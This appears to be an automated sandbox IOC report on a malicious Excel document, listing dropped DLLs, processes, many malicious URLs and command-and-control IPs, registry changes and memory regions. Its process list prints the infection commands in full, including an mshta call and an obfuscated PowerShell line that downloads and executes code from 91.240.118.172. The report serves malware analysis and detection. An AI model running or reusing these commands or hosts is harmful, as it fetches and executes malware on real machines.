IOC Report

loading gif

Files

File Path
Type
Category
Malicious
2022-28-01_1203.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
initial sample
malicious
C:\ProgramData\JooSee.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\2022-28-01_1203.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\314D.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DF867805B0D26A671C.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFE48AD7BAEDF545EE.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6QJATCN52MCG72WKR1GH.temp
data
dropped
C:\Windows\SysWOW64\Loacxlk\dndx.ncb (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.172/gg/ff/fe.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Loacxlk\dndx.ncb",UulABsIFcNr
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Loacxlk\dndx.ncb",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova",ntwFGKOXv
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm",AsDMHz
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm",DllRegisterServer
malicious
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://maxtdeveloper.com/okw9yx/
unknown
malicious
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
unknown
malicious
http://it-o.biz/bitrix/xoDdDe/PE3
unknown
malicious
http://www.inablr.com/elenctic/f
unknown
malicious
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
unknown
malicious
http://hostfeeling.com/wp-admin/
unknown
malicious
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.html#
unknown
malicious
https://property-eg.com/mlzkir/97v/
unknown
malicious
http://91.240.11
unknown
malicious
http://91.240.118.172/gg/ff/fe.png
91.240.118.172
malicious
http://91.240.118.172/gg/ff/fe.pngPE3
unknown
malicious
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
unknown
malicious
http://bimesarayenovin.ir/wp-adm
unknown
malicious
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
unknown
malicious
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
unknown
malicious
http://hostfeeling.com
unknown
malicious
http://daisy.sukoburu-secure.com
unknown
malicious
http://it-o.biz/
unknown
malicious
http://jurnalpjf.lan.go.id/assets/iM/
103.206.244.105
malicious
http://activetraining.sytes.net/
unknown
malicious
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
unknown
malicious
https://gudangtasorichina.com/wp-content/GG01c/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlHn?
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlngs
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlb
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlmshta
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlWinSta0
unknown
malicious
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
unknown
malicious
https://property-eg.com/mlzkir/97v/PE3
unknown
malicious
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
unknown
malicious
https://property-eg.com/mlzkir/9
unknown
malicious
http://91.240.118.172
unknown
malicious
http://activetraining.sytes.net/libraries/8s/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlfunction
unknown
malicious
http://maxtdeveloper.com/okw9yx/Gc28ZX/
unknown
malicious
http://it-o.biz/bitrix/xoDdDe/
unknown
malicious
https://gudangtasorichina.com/wp-content/GG01c/
unknown
malicious
http://totalplaytuxtla.com/sitio/DgktL3zd/
unknown
malicious
http://activetraining.sytes.net/libraries/8s/
unknown
malicious
http://91.240.118.172/gg/ff/fe.p
unknown
malicious
http://gardeningfilm.com/wp-cont
unknown
malicious
http://jurnalpjf.lan.go.id/assets/iM/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlB
unknown
malicious
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
unknown
malicious
http://bimesarayenovin.ir/wp-admin/G1pYGL/
unknown
malicious
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.html
91.240.118.172
malicious
https://160.16.102.168:80/OBNTMeNNkbReOLJsQFZWnjOBBXtVIsPD
unknown
https://160.16.102.168:80/OBNTMeNNkbReOLJsQFZWnjOBBXtVIsPD(
unknown
http://jurnalpjf.lan.go.id/asset
unknown
https://gudangtasorichina.com/wp
unknown
http://daisy.suk
unknown
http://jurnalpjf.lan.go.id
unknown
http://www.protware.com
unknown
http://totalplaytuxtla.com/sitio
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
http://www.piriform.com/ccleaner
unknown
There are 49 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
hostfeeling.com
164.90.147.135
malicious
jurnalpjf.lan.go.id
103.206.244.105
windowsupdate.s.llnwi.net
178.79.242.0

IPs

IP
Domain
Country
Malicious
195.154.133.20
unknown
France
malicious
185.157.82.211
unknown
Poland
malicious
212.237.17.99
unknown
Italy
malicious
79.172.212.216
unknown
Hungary
malicious
110.232.117.186
unknown
Australia
malicious
173.214.173.220
unknown
United States
malicious
212.24.98.99
unknown
Lithuania
malicious
138.185.72.26
unknown
Brazil
malicious
178.63.25.185
unknown
Germany
malicious
160.16.102.168
unknown
Japan
malicious
81.0.236.90
unknown
Czech Republic
malicious
103.75.201.2
unknown
Thailand
malicious
216.158.226.206
unknown
United States
malicious
45.118.115.99
unknown
Indonesia
malicious
51.15.4.22
unknown
France
malicious
159.89.230.105
unknown
United States
malicious
162.214.50.39
unknown
United States
malicious
200.17.134.35
unknown
Brazil
malicious
217.182.143.207
unknown
France
malicious
107.182.225.142
unknown
United States
malicious
51.38.71.0
unknown
France
malicious
45.118.135.203
unknown
Japan
malicious
50.116.54.215
unknown
United States
malicious
131.100.24.231
unknown
Brazil
malicious
46.55.222.11
unknown
Bulgaria
malicious
41.76.108.46
unknown
South Africa
malicious
173.212.193.249
unknown
Germany
malicious
45.176.232.124
unknown
Colombia
malicious
178.79.147.66
unknown
United Kingdom
malicious
212.237.5.209
unknown
Italy
malicious
162.243.175.63
unknown
United States
malicious
176.104.106.96
unknown
Serbia
malicious
207.38.84.195
unknown
United States
malicious
164.68.99.3
unknown
Germany
malicious
164.90.147.135
hostfeeling.com
United States
malicious
192.254.71.210
unknown
United States
malicious
212.237.56.116
unknown
Italy
malicious
104.168.155.129
unknown
United States
malicious
45.142.114.231
unknown
Germany
malicious
203.114.109.124
unknown
Thailand
malicious
209.59.138.75
unknown
United States
malicious
159.8.59.82
unknown
United States
malicious
129.232.188.93
unknown
South Africa
malicious
91.240.118.172
unknown
unknown
malicious
58.227.42.236
unknown
Korea Republic of
malicious
158.69.222.101
unknown
Canada
malicious
104.251.214.46
unknown
United States
malicious
103.206.244.105
jurnalpjf.lan.go.id
Indonesia
There are 38 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
q)-
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2D3F2
2D3F2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
d--
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33929
33929
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33F61
33F61
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 60 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1E1000
trusted library allocation
page execute read
malicious
2F81000
trusted library allocation
page execute read
malicious
181000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
480000
trusted library allocation
page execute and read and write
malicious
2690000
trusted library allocation
page execute and read and write
malicious
2380000
trusted library allocation
page execute and read and write
malicious
2491000
trusted library allocation
page execute read
malicious
2E21000
trusted library allocation
page execute read
malicious
3D0000
trusted library allocation
page execute and read and write
malicious
26F0000
trusted library allocation
page execute and read and write
malicious
420000
trusted library allocation
page execute and read and write
malicious
4B1000
trusted library allocation
page execute read
malicious
3D0000
trusted library allocation
page execute and read and write
malicious
871000
trusted library allocation
page execute read
malicious
150000
trusted library allocation
page execute and read and write
malicious
900000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
150000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2EE0000
trusted library allocation
page execute and read and write
malicious
270000
trusted library allocation
page execute and read and write
malicious
2920000
trusted library allocation
page execute and read and write
malicious
8A0000
trusted library allocation
page execute and read and write
malicious
4E0000
trusted library allocation
page execute and read and write
malicious
1E0000
trusted library allocation
page execute and read and write
malicious
26C1000
trusted library allocation
page execute read
malicious
2331000
trusted library allocation
page execute read
malicious
2581000
trusted library allocation
page execute read
malicious
510000
trusted library allocation
page execute and read and write
malicious
2F0000
trusted library allocation
page execute and read and write
malicious
451000
trusted library allocation
page execute read
malicious
170000
trusted library allocation
page execute and read and write
malicious
AD0000
trusted library allocation
page execute and read and write
malicious
451000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
10001000
unkown
page execute read
malicious
30A1000
trusted library allocation
page execute read
malicious
491000
trusted library allocation
page execute read
malicious
2500000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
8D1000
trusted library allocation
page execute read
malicious
231000
trusted library allocation
page execute read
malicious
1B1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
10001000
unkown
page execute read
malicious
4A0000
trusted library allocation
page execute and read and write
malicious
2B1000
trusted library allocation
page execute read
malicious
291000
trusted library allocation
page execute read
malicious
511000
trusted library allocation
page execute read
malicious
2460000
trusted library allocation
page execute and read and write
malicious
20D0000
trusted library allocation
page execute and read and write
malicious
A61000
trusted library allocation
page execute read
malicious
3131000
trusted library allocation
page execute read
malicious
461000
trusted library allocation
page execute read
malicious
2821000
trusted library allocation
page execute read
malicious
2390000
trusted library allocation
page execute and read and write
malicious
2F71000
trusted library allocation
page execute read
malicious
2F40000
trusted library allocation
page execute and read and write
malicious
1B0000
trusted library allocation
page execute and read and write
malicious
230000
trusted library allocation
page execute and read and write
malicious
2431000
trusted library allocation
page execute read
malicious
2951000
trusted library allocation
page execute read
malicious
2311000
trusted library allocation
page execute read
malicious
4E0000
trusted library allocation
page execute and read and write
malicious
2471000
trusted library allocation
page execute read
malicious
30B6000
heap
page read and write
224E000
trusted library allocation
page read and write
2542000
heap
page read and write
312B000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
72C000
heap
page read and write
2937000
trusted library allocation
page read and write
24B4000
trusted library allocation
page read and write
2D4000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
2932000
trusted library allocation
page read and write
301F000
trusted library allocation
page read and write
3643000
trusted library allocation
page read and write
3036000
heap
page read and write
245E000
stack
page read and write
2F6C000
trusted library allocation
page read and write
2920000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
32FE000
stack
page read and write
1FC1000
trusted library allocation
page read and write
1BD6000
heap
page read and write
346D000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
305C000
trusted library allocation
page read and write
2D70000
trusted library allocation
page read and write
40E000
heap
page read and write
34B8000
trusted library allocation
page read and write
3091000
heap
page read and write
2F62000
trusted library allocation
page read and write
2580000
trusted library allocation
page read and write
4F0000
heap
page read and write
2939000
trusted library allocation
page read and write
2E8000
heap
page read and write
66D000
heap
page read and write
39CA000
stack
page read and write
4B30000
trusted library allocation
page read and write
34CF000
trusted library allocation
page read and write
305E000
heap
page read and write
1DC000
stack
page read and write
1A0000
heap
page read and write
2F2E000
stack
page read and write
23F2000
heap
page read and write
4B18000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
1F94000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
23D4000
heap
page read and write
23B0000
heap
page read and write
2C17000
heap
page read and write
3EC000
heap
page read and write
2C08000
trusted library allocation
page read and write
2590000
trusted library allocation
page read and write
38F000
heap
page read and write
312B000
trusted library allocation
page read and write
843E000
trusted library allocation
page read and write
30A0000
trusted library allocation
page read and write
2C0B000
trusted library allocation
page read and write
292D000
trusted library allocation
page read and write
72D6000
heap
page read and write
2354000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
2FF0000
trusted library allocation
page read and write
FC000
stack
page read and write
3180000
trusted library allocation
page read and write
10046000
unkown
page readonly
B20000
heap
page read and write
1FE4000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
560000
heap
page read and write
2CDE000
trusted library allocation
page read and write
31E1000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
2454000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
7FF00210000
trusted library allocation
page read and write
3AD2000
trusted library allocation
page read and write
20000
heap
page read and write
3261000
trusted library allocation
page read and write
27E0000
trusted library section
page readonly
1FE7000
trusted library allocation
page read and write
290000
trusted library allocation
page read and write
3038000
trusted library allocation
page read and write
30C9000
heap
page read and write
30000
heap
page read and write
3110000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
30C9000
heap
page read and write
2800000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
4754000
heap
page read and write
30E0000
heap
page read and write
4B18000
trusted library allocation
page read and write
565000
heap
page read and write
2470000
heap
page read and write
2B1D000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
478E000
heap
page read and write
30CB000
trusted library allocation
page read and write
20E0000
heap
page read and write
392000
heap
page read and write
34CF000
trusted library allocation
page read and write
34CF000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
14B000
stack
page read and write
4B18000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
8F4E000
trusted library allocation
page read and write
7FF00240000
trusted library allocation
page execute and read and write
2C0F000
stack
page read and write
1B80000
trusted library section
page read and write
2490000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
2814000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
2AAA000
heap
page execute and read and write
4753000
heap
page read and write
4B24000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
184000
heap
page read and write
18D000
heap
page read and write
27EF000
trusted library section
page readonly
2B1D000
trusted library allocation
page read and write
2BF3000
trusted library allocation
page read and write
1AD80000
trusted library allocation
page read and write
883E000
trusted library allocation
page read and write
30F7000
heap
page read and write
3074000
heap
page read and write
34CF000
trusted library allocation
page read and write
308D000
heap
page read and write
2AE0000
heap
page execute and read and write
4B24000
trusted library allocation
page read and write
87BE000
trusted library allocation
page read and write
474000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
1B53F000
heap
page read and write
2955000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
650000
heap
page read and write
30C7000
heap
page read and write
1FC1000
trusted library allocation
page read and write
2EB0000
trusted library allocation
page read and write
1B95000
heap
page read and write
2B1D000
trusted library allocation
page read and write
29BD000
stack
page read and write
35E8000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
1005A000
unkown
page readonly
1FE4000
trusted library allocation
page read and write
476A000
heap
page read and write
3036000
heap
page read and write
2F50000
trusted library allocation
page read and write
34B8000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
2590000
trusted library allocation
page read and write
657000
heap
page read and write
2B1D000
trusted library allocation
page read and write
2945000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page execute and read and write
2860000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
3104000
heap
page read and write
3300000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
430000
heap
page read and write
2937000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
27BF000
stack
page read and write
4B24000
trusted library allocation
page read and write
1D3000
trusted library allocation
page read and write
292D000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
2F40000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
29EE000
stack
page read and write
34BA000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
8D7E000
trusted library allocation
page read and write
2989000
heap
page read and write
30CB000
heap
page read and write
24FE000
stack
page read and write
87BE000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
30C3000
heap
page read and write
2C0D000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
29BF000
heap
page read and write
3070000
trusted library allocation
page read and write
2933000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
7FF00112000
trusted library allocation
page execute and read and write
56B000
heap
page read and write
84EE000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
30F7000
heap
page read and write
38B000
heap
page read and write
4D4000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
7FF00022000
trusted library allocation
page execute and read and write
1FE4000
trusted library allocation
page read and write
40E000
heap
page read and write
1FE7000
trusted library allocation
page read and write
598000
heap
page read and write
2B1D000
trusted library allocation
page read and write
720000
heap
page read and write
1DA0000
trusted library allocation
page read and write
329000
heap
page read and write
460000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
2D60000
trusted library allocation
page read and write
3D0000
trusted library allocation
page read and write
2CDE000
trusted library allocation
page read and write
27E9000
trusted library section
page readonly
2F8B000
trusted library allocation
page read and write
2B70000
heap
page read and write
358000
heap
page read and write
2CDE000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
8F4E000
trusted library allocation
page read and write
30BA000
heap
page read and write
12D25000
trusted library allocation
page read and write
410000
heap
page read and write
5D4000
heap
page read and write
4B18000
trusted library allocation
page read and write
338000
heap
page read and write
568000
heap
page read and write
396000
heap
page read and write
3091000
heap
page read and write
7FF00180000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
585000
heap
page read and write
2C0E000
stack
page read and write | page guard
87BE000
trusted library allocation
page read and write
22AB000
heap
page read and write
2C1D000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
2CDE000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
10046000
unkown
page readonly
2050000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
10046000
unkown
page readonly
1FE4000
trusted library allocation
page read and write
30C3000
heap
page read and write
274000
heap
page read and write
301C000
heap
page read and write
2F69000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
450000
trusted library allocation
page read and write
3087000
trusted library allocation
page read and write
1005A000
unkown
page readonly
349F000
trusted library allocation
page read and write
E82E000
trusted library allocation
page read and write
737000
heap
page read and write
12FD2000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
334C000
stack
page read and write
2937000
trusted library allocation
page read and write
2C0A000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
30CB000
heap
page read and write
2800000
trusted library allocation
page read and write
70D000
heap
page read and write
1FE4000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
768000
heap
page read and write
1B501000
heap
page read and write
30BD000
heap
page read and write
34BA000
trusted library allocation
page read and write
30D0000
heap
page read and write
34CF000
trusted library allocation
page read and write
1C0000
heap
page read and write
2C08000
trusted library allocation
page read and write
34CF000
trusted library allocation
page read and write
10000000
unkown
page readonly
38B000
heap
page read and write
4B24000
trusted library allocation
